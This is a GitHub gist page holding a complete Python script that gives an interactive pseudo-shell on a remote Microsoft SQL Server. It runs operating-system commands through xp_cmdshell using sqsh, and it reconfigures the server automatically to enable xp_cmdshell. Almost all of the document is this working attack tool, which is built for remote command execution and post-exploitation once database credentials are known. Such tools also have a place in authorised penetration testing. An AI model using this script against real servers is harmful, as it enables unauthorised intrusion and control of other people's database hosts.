Created
June 10, 2022 00:04
-
-
Save SeanPesce/b9f3b9b6b87c57bc3d1d529fe0476d68 to your computer and use it in GitHub Desktop.
Interactive pseudo-shell for executing shell commands on a remote MSSQL server via xp_cmdshell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Author: Sean Pesce | |
# This script acts as a pseudo-shell by executing shell commands on a remote MSSQL server instance | |
# using sqsh and xp_cmdshell. | |
import argparse | |
import os | |
import platform | |
import re | |
import subprocess | |
import sys | |
from cmd import Cmd | |
SQSH_URL = 'https://github.com/vonloxley/sqsh' | |
CONNECTION_ERROR_MSG = 'Failed to connect to the MSSQL server.' | |
def sqsh_installed(): | |
""" | |
Returns True if sqsh is installed. | |
https://github.com/vonloxley/sqsh | |
""" | |
null_output = '/dev/null' | |
if 'windows' in platform.system().lower(): | |
null_output = 'NUL' | |
retcode = os.system(f'sqsh --help > {null_output} 2>&1') | |
return not retcode | |
def output_has_connection_error(output): | |
""" | |
Returns True if a connection error message was detected in the given output data | |
""" | |
return b'connection failed' in output.lower() | |
class XpCmdShell(Cmd): | |
prompt = 'sql$ ' | |
intro = 'Connected to remote server.\n' | |
# Class variables for cleaning up output | |
output_delimiter = 'zZzZzZSeanPZzZzZz' | |
output_whitespace_threshold = 100 | |
def __init__(self, host, port, user, password, encoding='utf8'): | |
super(self.__class__, self).__init__() | |
self.host = host | |
self.port = int(port) | |
self.user = user | |
self.password = password | |
self.encoding = encoding | |
self.__class__.prompt = f'{self.user}@{self.host} $ ' | |
self.__class__.intro = f'Connected to {self.host}:{self.port}\n' | |
def sqsh_command_str(self, command): | |
""" | |
Returns a string containing a shell command to execute raw SQL via sqsh | |
""" | |
user = self.user.replace('\\', '\\\\') | |
password = self.password.replace('\\', '\\\\') | |
command = command.replace('\\', '\\\\').replace('"', '\\"') | |
return f'sqsh -P {password} -S {self.host}:{int(self.port)} -U {user} -C "{command}"' | |
def sqsh_command_list(self, command): | |
""" | |
Returns a string containing a shell command to execute raw SQL via sqsh | |
""" | |
#command = command.replace('\\', '\\\\').replace('"', '\\"') | |
return [ 'sqsh', '-P', self.password, '-S', f'{self.host}:{int(self.port)}', '-U', self.user, '-C', command ] | |
def sqsh_xp_cmdshell_str(self, command): | |
""" | |
Returns a string containing a shell command to execute shell commands on the remote MSSQL host via xp_cmdshell | |
""" | |
return self.sqsh_command_str(f'xp_cmdshell \'{command}\'') | |
def sqsh_xp_cmdshell_list(self, command): | |
""" | |
Returns a string containing a shell command to execute shell commands on the remote MSSQL host via xp_cmdshell | |
""" | |
return self.sqsh_command_list(f'xp_cmdshell \'{command}\'') | |
def get_xp_cmdshell_output_using_delims(self, command): | |
delim = self.__class__.output_delimiter | |
sqsh_cmd = self.sqsh_xp_cmdshell_list(f'echo {delim} & {command} & echo {delim}') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
output = output.decode(self.encoding) | |
# Isolate output using hard-coded delimiter | |
assert delim in output, f'Failed to obtain output for command: "{command}"' | |
output = output[output.find(delim)+len(delim):] | |
output = output[:output.find(delim)] | |
# Remove unnecessary whitespace | |
output = output.strip() | |
output = re.sub('[ \n\r\t]{'+str(self.__class__.output_whitespace_threshold)+',}', '\n', output) | |
return output | |
def check_connection(self): | |
""" | |
Returns True if connection to the MSSQL server succeeded | |
""" | |
print(f'Checking connection to server {self.host}:{self.port}') | |
sqsh_cmd = self.sqsh_command_str('select \'\'') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT, shell=True) | |
return not output_has_connection_error(output) | |
def enable_xp_cmdshell(self): | |
print('Enabling xp_cmdshell') | |
sqsh_cmd = self.sqsh_command_str('EXEC SP_CONFIGURE \'show advanced options\', 1') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT, shell=True) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
assert b'\'show advanced options\' changed from' in output, 'Failed to enable advanced options. Try running this script again with "--no-reconfig"' | |
sqsh_cmd = self.sqsh_command_str('RECONFIGURE') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT, shell=True) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
sqsh_cmd = self.sqsh_command_str('EXEC SP_CONFIGURE \'xp_cmdshell\', 1') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT, shell=True) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
assert b'\'xp_cmdshell\' changed from' in output, 'Failed to enable xp_cmdshell. Try running this script again with "--no-reconfig"' | |
sqsh_cmd = self.sqsh_command_str('RECONFIGURE') | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT, shell=True) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
def do_exit(self, line): | |
print("Exiting") | |
return True | |
def do_quit(self, line): | |
return self.do_exit(line) | |
def help_exit(self): | |
print('Exit this shell.') | |
def help_quit(self): | |
self.help_exit() | |
def do_sql(self, line): | |
sqsh_cmd = self.sqsh_command_list(line) | |
output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT) | |
assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
output = output.decode(self.encoding) | |
print(output) | |
def help_sql(self): | |
print('Usage:\n\n\tsql <SQL STATEMENT>\n\nExecute a raw SQL statement on the server.') | |
def default(self, line): | |
""" | |
Default behavior: Run shell commands on the remote server via xp_cmdshell | |
""" | |
if not line: | |
print() | |
return | |
## Raw sqsh output: | |
#sqsh_cmd = self.sqsh_xp_cmdshell_list(line) | |
#output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT) | |
#assert not output_has_connection_error(output), CONNECTION_ERROR_MSG | |
#output = output.decode(self.encoding) | |
# Cleaner-looking output that has a (low) potential to be malformed due to the sanitization process | |
output = self.get_xp_cmdshell_output_using_delims(line) | |
print(output) | |
if __name__ == '__main__': | |
arg_parser = argparse.ArgumentParser(description='Wrapper shell for executing commands via xp_cmdshell on a Microsoft SQL (MSSQL) server.') | |
arg_parser.add_argument('-H', '--host', help='MSSQL server host/IP address', required=True) | |
arg_parser.add_argument('-p', '--port', type=int, default=1433, help='MSSQL server port') | |
arg_parser.add_argument('-u', '--username', help='MSSQL server username', required=True) #, default='sa') | |
arg_parser.add_argument('-P', '--password', help='MSSQL server password', required=True) | |
arg_parser.add_argument('-n', '--no-reconfig', action='store_true', help='Disables automatic server reconfiguration to enable xp_cmdshell. Useful when the user has low privileges, but xp_cmdshell is already enabled.') | |
arg_parser.set_defaults(no_reconfig=False) | |
args = arg_parser.parse_args() | |
if not sqsh_installed(): | |
print('[ERROR] sqsh is not installed. You might be able to install it with "sudo apt-get install -y sqsh"; otherwise, get it here:') | |
print(f'\t{SQSH_URL}') | |
sys.exit(1) | |
xp_cmdshell = XpCmdShell(args.host, args.port, args.username, args.password) | |
if not xp_cmdshell.check_connection(): | |
print(f'[ERROR] {CONNECTION_ERROR_MSG}') | |
sys.exit(1) | |
if not args.no_reconfig: | |
xp_cmdshell.enable_xp_cmdshell() | |
xp_cmdshell.cmdloop() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment